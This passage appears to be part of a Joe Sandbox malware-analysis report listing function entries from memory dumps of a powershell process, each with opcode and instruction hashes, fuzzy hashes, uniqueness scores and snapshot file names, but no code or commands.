                                                          • Opcode ID: d7da7fd62eae0d17ecf20b8834a5bda1246ec5472eaec95ce4782f1f7ba0ac0e
                                                          • Instruction ID: 8dd777c930d99fc7a6ad8133af3af2db83c719016d8622805ccf9ef310079153
                                                          • Opcode Fuzzy Hash: d7da7fd62eae0d17ecf20b8834a5bda1246ec5472eaec95ce4782f1f7ba0ac0e
                                                          • Instruction Fuzzy Hash: 6E01407144E3C09ED7128B258994B62BFB8DF53224F1D81DBD9888F1A7C2695848C772
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0498F7C1 Relevance: .0, Instructions: 41COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1325365383.0000000004980000.00000040.00000800.00020000.00000000.sdmp, Offset: 04980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_4980000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7d8f155556c35df1c672ddc2844a16feeb8af3bdc22e11d69f90b2e19af3a106
                                                          • Instruction ID: e6e4af53c98fe68f9e71d6561926f642ecb5d7397e986c6e198b61516c24de15
                                                          • Opcode Fuzzy Hash: 7d8f155556c35df1c672ddc2844a16feeb8af3bdc22e11d69f90b2e19af3a106
                                                          • Instruction Fuzzy Hash: 2301E971D10B4A9BCB04DFE4C9446EDBBB1FF99300F104B1EE019AA615EBB06685CB81
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04987958 Relevance: .0, Instructions: 41COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1325365383.0000000004980000.00000040.00000800.00020000.00000000.sdmp, Offset: 04980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_4980000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 08fe74bb2c07b0ec535dafae55696be134f92ed2be8723a0923139b3c52daf2e
                                                          • Instruction ID: 0443e9b82d92f2e1c24977aacf20cd245f76d3f7798f14ac199c4ef719ca486c
                                                          • Opcode Fuzzy Hash: 08fe74bb2c07b0ec535dafae55696be134f92ed2be8723a0923139b3c52daf2e
                                                          • Instruction Fuzzy Hash: C1F04631705344AFD721A6A8AC4496F7FE9EB892617000AEEE149DB342CE647C498361
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0321D9A7 Relevance: .0, Instructions: 37COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1325020109.000000000321D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0321D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_321d000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c129e5e4d4c4e502b3bde1f532f8d68a0d4222bae080b8d10641c8d9b8340b68
                                                          • Instruction ID: 825b71a3f5989ed77bdf6aa62d022fce8a69e195854ba2100fdc9241ae0fae39
                                                          • Opcode Fuzzy Hash: c129e5e4d4c4e502b3bde1f532f8d68a0d4222bae080b8d10641c8d9b8340b68
                                                          • Instruction Fuzzy Hash: 67F0F976600600AFD720CF0ADA85C23FBEDEBD4670719C55AE84A8B612C672FC41CEA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 049890E0 Relevance: .0, Instructions: 37COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1325365383.0000000004980000.00000040.00000800.00020000.00000000.sdmp, Offset: 04980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_4980000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7b50fb736dd7f5015294f92eb6f7b4a650d5b6406a463afdc67c934dc4faf435
                                                          • Instruction ID: a494043a95d46f41b57f6247f6027086242415d1d5bebd420a5e18385f578333
                                                          • Opcode Fuzzy Hash: 7b50fb736dd7f5015294f92eb6f7b4a650d5b6406a463afdc67c934dc4faf435
                                                          • Instruction Fuzzy Hash: 51F022756087444FE301EB28C0193AB7BE2EBC1314F1080AEC54A8B386CE796C42CBE1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0498DE40 Relevance: .0, Instructions: 34COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1325365383.0000000004980000.00000040.00000800.00020000.00000000.sdmp, Offset: 04980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_4980000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0a29c61025813348ae445c414984da42b58a59027649f232a029c04e639d7230
                                                          • Instruction ID: d2b4e6ef8b719bbf92ee96f7f8c284831439ff9a2e174d612cba1a909493d847
                                                          • Opcode Fuzzy Hash: 0a29c61025813348ae445c414984da42b58a59027649f232a029c04e639d7230
                                                          • Instruction Fuzzy Hash: C5F05E397041408FC3119B2CE498DA6BBF59FCA61531911AEE589CF373DA61DC02CB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0321D998 Relevance: .0, Instructions: 33COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1325020109.000000000321D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0321D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_321d000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 341aa44ec078066790d72685009150fcbc2306aca07c325160379e090aab755d
                                                          • Instruction ID: 6dd19ad4936677d98da58da13d11fc82cd875960f93dc503635ab4efe9d0351f
                                                          • Opcode Fuzzy Hash: 341aa44ec078066790d72685009150fcbc2306aca07c325160379e090aab755d
                                                          • Instruction Fuzzy Hash: D9F0F975110A40AFD725CF06CE85D23BBB9EB95664B198499E85A8B312C671FC42CF60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0498F7D0 Relevance: .0, Instructions: 33COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1325365383.0000000004980000.00000040.00000800.00020000.00000000.sdmp, Offset: 04980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_4980000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ebf7bfd18f3d8f28f0eb473d6d7bae815ccc377c9c5aa7e491eca7b5b4c3277d
                                                          • Instruction ID: b234c66b38fc35ddec23483fc5351b910139aba6575b00a1a530ca141f863be3
                                                          • Opcode Fuzzy Hash: ebf7bfd18f3d8f28f0eb473d6d7bae815ccc377c9c5aa7e491eca7b5b4c3277d
                                                          • Instruction Fuzzy Hash: C601C071D1074ADBCB04DFE4C8446ADBBB1FF99300F10472AE015AA604EBB026858B80
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04989160 Relevance: .0, Instructions: 33COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1325365383.0000000004980000.00000040.00000800.00020000.00000000.sdmp, Offset: 04980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_4980000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5f22b61529e32f46522564d64171dacedccbb75bde6db726fcef5fe089d36ff1
                                                          • Instruction ID: b7b48afe0ca35037065397dbe83b2a299287048f9dedd6cac570cfca71a78bc1
                                                          • Opcode Fuzzy Hash: 5f22b61529e32f46522564d64171dacedccbb75bde6db726fcef5fe089d36ff1
                                                          • Instruction Fuzzy Hash: 80F0B4705097544FD721DF78D49C3967FE4EB41310F0048AED64ECB282DB756880C751
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04987968 Relevance: .0, Instructions: 33COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1325365383.0000000004980000.00000040.00000800.00020000.00000000.sdmp, Offset: 04980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_4980000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1829e64e4508c8df3fae784a5a60224ad2723754406b9f510032ec282c6472bf
                                                          • Instruction ID: 130af781cda55a894d053cd875d146ce4c803d7e0d5578e9b1c59e16e7ada3b2
                                                          • Opcode Fuzzy Hash: 1829e64e4508c8df3fae784a5a60224ad2723754406b9f510032ec282c6472bf
                                                          • Instruction Fuzzy Hash: D9F0A0357007189FD710AA6AE844A6FBBEAEBC8271B00096DE20AD7340DF71AD4587A1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0498E7A8 Relevance: .0, Instructions: 32COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1325365383.0000000004980000.00000040.00000800.00020000.00000000.sdmp, Offset: 04980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_4980000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3fb8fce68f36e733d590ec03045c879801616843484a7dde14d2eea8d397ec17
                                                          • Instruction ID: f25cfd8242307f524fe60a7af871f3f5f3f099c1fb682cbdeb615964185bc782
                                                          • Opcode Fuzzy Hash: 3fb8fce68f36e733d590ec03045c879801616843484a7dde14d2eea8d397ec17
                                                          • Instruction Fuzzy Hash: E7E06831F143945ACF21576C9896ADEBF64EBCA234F4408FDD74ABF203D6A108158351
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04987697 Relevance: .0, Instructions: 31COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1325365383.0000000004980000.00000040.00000800.00020000.00000000.sdmp, Offset: 04980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_4980000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6da1c7342401fc337d382f54852192372eb35f0d08046effd9c769d8aaf9fb67
                                                          • Instruction ID: e1eded353276addb27bab8eb702c862045b499b8e32ac7307106026cc4e09e3e
                                                          • Opcode Fuzzy Hash: 6da1c7342401fc337d382f54852192372eb35f0d08046effd9c769d8aaf9fb67
                                                          • Instruction Fuzzy Hash: 3BF037397005148FDB10EBADDD40AA977E6EBCC65571541A9E509CB314DF35DC028BA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 049890F0 Relevance: .0, Instructions: 31COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1325365383.0000000004980000.00000040.00000800.00020000.00000000.sdmp, Offset: 04980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_4980000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0c98ccbfb9f75f5c227c78acd00b3471452211a8a3b100735e0e05e005c23d87
                                                          • Instruction ID: a51f7aef123eef6010e1a13683de4f284b4524728d1297857cc2ce3b2c6c995f
                                                          • Opcode Fuzzy Hash: 0c98ccbfb9f75f5c227c78acd00b3471452211a8a3b100735e0e05e005c23d87
                                                          • Instruction Fuzzy Hash: 76F027796046148BE304FB6DD01479B7BE6EBC0318F10C16ED6094B3C4DE796841CBE1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0498DC90 Relevance: .0, Instructions: 31COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1325365383.0000000004980000.00000040.00000800.00020000.00000000.sdmp, Offset: 04980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_4980000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 81699256d08bdd63ee60a77f6d568afe4f67bf6088aadb1acd1a82710362349c
                                                          • Instruction ID: a2a0a17b0f11536901f513e99bfdc0f5a19a0dbc66348a9ddbc9a2fba12610b2
                                                          • Opcode Fuzzy Hash: 81699256d08bdd63ee60a77f6d568afe4f67bf6088aadb1acd1a82710362349c
                                                          • Instruction Fuzzy Hash: C9F0E535609B801BC323932DA810C9E7FEACEC617530845EED049DF252CA94DD0987F7
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04989549 Relevance: .0, Instructions: 30COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1325365383.0000000004980000.00000040.00000800.00020000.00000000.sdmp, Offset: 04980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_4980000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6ffe89b993d4adf400bb3353c5704c9972553f112f9998a413a56cd37d5ae592
                                                          • Instruction ID: e984ce5d6875ba381ed88347295be3fc936c521d47bdd5f9ac9241fdbb70d6e1
                                                          • Opcode Fuzzy Hash: 6ffe89b993d4adf400bb3353c5704c9972553f112f9998a413a56cd37d5ae592
                                                          • Instruction Fuzzy Hash: 6FE0D8527551510E9711B3BC081027A5A8AEFD557574502BE8A16DB2C2DC40DC0943B2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0498DE50 Relevance: .0, Instructions: 30COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1325365383.0000000004980000.00000040.00000800.00020000.00000000.sdmp, Offset: 04980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_4980000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2e36cba52d31f27c98368db8822b1c56bd25673d50b12be611a9a32d6d0f6e61
                                                          • Instruction ID: e7b8b0f5c899110f1cf47db6ec5537414e5d61c539e6f074f5fa51260f72c865
                                                          • Opcode Fuzzy Hash: 2e36cba52d31f27c98368db8822b1c56bd25673d50b12be611a9a32d6d0f6e61
                                                          • Instruction Fuzzy Hash: DFE0ED357001148F83109B1DE498D66B7EAEFDE66531511A9E945CB361DA61EC01CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0498DCE1 Relevance: .0, Instructions: 29COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1325365383.0000000004980000.00000040.00000800.00020000.00000000.sdmp, Offset: 04980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_4980000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c29c098950ac4b6afee00f2374401328c4ee43ab84405693e4ec5f8f558143e9
                                                          • Instruction ID: a8ee671f2be9a355432cc97ca8421ff933632b40692de3f0904077e8789cb4e0
                                                          • Opcode Fuzzy Hash: c29c098950ac4b6afee00f2374401328c4ee43ab84405693e4ec5f8f558143e9
                                                          • Instruction Fuzzy Hash: 0FE0E531708440978B18C65CE4444E9BB71DFC9220F0489BED50AA7245DA216C5696E0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0498E92E Relevance: .0, Instructions: 29COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1325365383.0000000004980000.00000040.00000800.00020000.00000000.sdmp, Offset: 04980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_4980000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5526530816ccdeeb0b14c6487951b9b6178455b875d1d040a2eac9d08749747d
                                                          • Instruction ID: 501ca58d02870b06b1624a4b8c5b911bb21b09e2affc88de1774e751f5dce725
                                                          • Opcode Fuzzy Hash: 5526530816ccdeeb0b14c6487951b9b6178455b875d1d040a2eac9d08749747d
                                                          • Instruction Fuzzy Hash: 3BF06D39A01118DFCB00DF98E595D9DFBB2FB88215B158599E909AB352CB31AD01CB40
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0498896A Relevance: .0, Instructions: 29COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1325365383.0000000004980000.00000040.00000800.00020000.00000000.sdmp, Offset: 04980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_4980000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a46d6d97ff14ec9949bb6cbf7b590bc958c86f8e6b33934c38ebdc8782b421dd
                                                          • Instruction ID: d090e0980d34a8a4f3281d6609786be79fb9f2928e82dc1fbb64c05c3844d78f
                                                          • Opcode Fuzzy Hash: a46d6d97ff14ec9949bb6cbf7b590bc958c86f8e6b33934c38ebdc8782b421dd
                                                          • Instruction Fuzzy Hash: 71F020383082A44BC70A673894082AD7FA2AFC2321F0401AEE60A8F243CEA8090583D1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0498AF98 Relevance: .0, Instructions: 28COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1325365383.0000000004980000.00000040.00000800.00020000.00000000.sdmp, Offset: 04980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_4980000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f2927b347b4a4c8f194ead2199acc4afb05500c710ba6e5ae61a263459bfa7b2
                                                          • Instruction ID: b37a84bd5ea0702ba572dd34dbdcc6a58867f065bc1ebed97dfa97299c5a833a
                                                          • Opcode Fuzzy Hash: f2927b347b4a4c8f194ead2199acc4afb05500c710ba6e5ae61a263459bfa7b2
                                                          • Instruction Fuzzy Hash: 03E0262675D7E11B8B17933EA8604A6AF739AC323030D89FFE189CF643DC559C068361
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04989170 Relevance: .0, Instructions: 25COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1325365383.0000000004980000.00000040.00000800.00020000.00000000.sdmp, Offset: 04980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_4980000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 699690740cfa69f799805543c43925032312696733627d8484b75a16b8ac1cbe
                                                          • Instruction ID: c328918fe6d44b85aeeeb777df43ecba664ef67481352f6d682ef037f5d75ed7
                                                          • Opcode Fuzzy Hash: 699690740cfa69f799805543c43925032312696733627d8484b75a16b8ac1cbe
                                                          • Instruction Fuzzy Hash: 84F06D709003184BD760DF78D49C79ABBE9EB44310F00446DE20ECB281DB75A880CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04988978 Relevance: .0, Instructions: 24COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1325365383.0000000004980000.00000040.00000800.00020000.00000000.sdmp, Offset: 04980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_4980000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 71066e0300d828b841c77180021c4a173f70835ac3059cddd48944ee213151ec
                                                          • Instruction ID: e435beec6d452c8fda41f95907d6ff4b252cc7644e337f962cbe3f6bea24826d
                                                          • Opcode Fuzzy Hash: 71066e0300d828b841c77180021c4a173f70835ac3059cddd48944ee213151ec
                                                          • Instruction Fuzzy Hash: E8E0263930422857CB083B78A40C2AEBA9AEFC4725F00006EE61A8B343CFB85A1183D5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04989558 Relevance: .0, Instructions: 23COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1325365383.0000000004980000.00000040.00000800.00020000.00000000.sdmp, Offset: 04980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_4980000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: bde709a1a43fe4bc11ec476ae87d1fe453d71112e636055681eefe24544e7e47
                                                          • Instruction ID: 64da8a483dd45b3308822e6700e553cd636e5800f221d0f60d65ac143541ce59
                                                          • Opcode Fuzzy Hash: bde709a1a43fe4bc11ec476ae87d1fe453d71112e636055681eefe24544e7e47
                                                          • Instruction Fuzzy Hash: 13D0A7527811261B5B54B1FE18006BBA5CFEFD55A5785043E9E05E3385EC40EC0903F2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0498DCA0 Relevance: .0, Instructions: 23COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1325365383.0000000004980000.00000040.00000800.00020000.00000000.sdmp, Offset: 04980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_4980000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f40d8000488879ba3cb2fca38777065befdcbf185dd25c4b4714f5bd982472de
                                                          • Instruction ID: 4e653f7c52cfa48d60ff3c4d3dede44e66081edcfcb0d2d37310bfc9d6914b7c
                                                          • Opcode Fuzzy Hash: f40d8000488879ba3cb2fca38777065befdcbf185dd25c4b4714f5bd982472de
                                                          • Instruction Fuzzy Hash: EAE08C35700718078322A65EA80085E7AEFDEC95B5304802EE1198B340DEA8E90647E6
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0498DCF0 Relevance: .0, Instructions: 23COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1325365383.0000000004980000.00000040.00000800.00020000.00000000.sdmp, Offset: 04980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_4980000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                                          • Instruction ID: 820db52a9d11de7b5adbb6699225158fb8f2c2b4919a8ef92f4fecabafcd5c9b
                                                          • Opcode Fuzzy Hash: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                                          • Instruction Fuzzy Hash: 9CE08631B00014978B08D59DD4544E9F7A6DFCC220F04847ED90AA7381EA32691686E1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04988739 Relevance: .0, Instructions: 22COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1325365383.0000000004980000.00000040.00000800.00020000.00000000.sdmp, Offset: 04980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_4980000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: bfb81c6248c641df131f457451263e886a8e74aa7e0464eb0870ccc090422870
                                                          • Instruction ID: f3b8d02a5679b19d8e797f347a02a8433eb4920212575485ebac74a3e1e7519a
                                                          • Opcode Fuzzy Hash: bfb81c6248c641df131f457451263e886a8e74aa7e0464eb0870ccc090422870
                                                          • Instruction Fuzzy Hash: 2DE04F3190454D8BCB19BBA4D85A4ED7F74FA05301B40089CEA5B5A193EAA01986CBC1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04988800 Relevance: .0, Instructions: 21COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1325365383.0000000004980000.00000040.00000800.00020000.00000000.sdmp, Offset: 04980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_4980000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e56700ae2635b2196715912dec1c6cfbe531baa00058e554ab4dade4d69765f3
                                                          • Instruction ID: 5d0b2ab45682280abcb32cf765df39581364e34ed042db47882bc3c1deafff11
                                                          • Opcode Fuzzy Hash: e56700ae2635b2196715912dec1c6cfbe531baa00058e554ab4dade4d69765f3
                                                          • Instruction Fuzzy Hash: AFE04F3491868A8BCB15EBA8D44696DBFB0FF46250B0046ADEE4D9B203E6311995CF81
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0498F860 Relevance: .0, Instructions: 19COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1325365383.0000000004980000.00000040.00000800.00020000.00000000.sdmp, Offset: 04980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_4980000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 87cbf04c6150d7a78791b3f09a8e889cfc84147626f9ac976db9effa6851e7fa
                                                          • Instruction ID: 2a944d496e269e5dd8c5d02c3154bad30fa8978ff3d1ec11b39b980c77413961
                                                          • Opcode Fuzzy Hash: 87cbf04c6150d7a78791b3f09a8e889cfc84147626f9ac976db9effa6851e7fa
                                                          • Instruction Fuzzy Hash: EDE04F70E4010A9F8780EFAC88415ADFBF0EB08300F2085AAC959E3302F3329A12DFC1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0498F870 Relevance: .0, Instructions: 16COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1325365383.0000000004980000.00000040.00000800.00020000.00000000.sdmp, Offset: 04980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_4980000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                          • Instruction ID: 8a8384a1f3bad1bae40afcf367bc6858d051c605b261b681d5a63db003ecc5ac
                                                          • Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                          • Instruction Fuzzy Hash: 3FD042B0E042099F8780EFAD894156EFBF4AB48200B6085AA8919E7201E6329A129BD1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04988748 Relevance: .0, Instructions: 15COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1325365383.0000000004980000.00000040.00000800.00020000.00000000.sdmp, Offset: 04980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_4980000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 537a306fe8b7ee45ef83c5fe2e1cc771eacd449b00d3554b4c6bed14ae635f5b
                                                          • Instruction ID: a8dd2686d45a8fab49ec596f24d67008958c5ae433cd23f8e1b66e1437e08f24
                                                          • Opcode Fuzzy Hash: 537a306fe8b7ee45ef83c5fe2e1cc771eacd449b00d3554b4c6bed14ae635f5b
                                                          • Instruction Fuzzy Hash: 8BD0673190411D8BCB08FBA5E85A4BDBB78FA14301F4045ADE91756192EAB12A5ACAC5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04988810 Relevance: .0, Instructions: 15COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1325365383.0000000004980000.00000040.00000800.00020000.00000000.sdmp, Offset: 04980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_4980000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 61a5f26c7816bd2f5be037432c81a93f838a6f980080010e039d78c5501a8e6f
                                                          • Instruction ID: 867a58bb475e944e364d8a4cb1ceb4b3aa542893f51071a9f0abedee574883f9
                                                          • Opcode Fuzzy Hash: 61a5f26c7816bd2f5be037432c81a93f838a6f980080010e039d78c5501a8e6f
                                                          • Instruction Fuzzy Hash: 37D01734E0820E8FCB08EFA8E44686EBBB9EB44200F0045A9E90997341EA306901CBC1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0498EA57 Relevance: .0, Instructions: 14COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
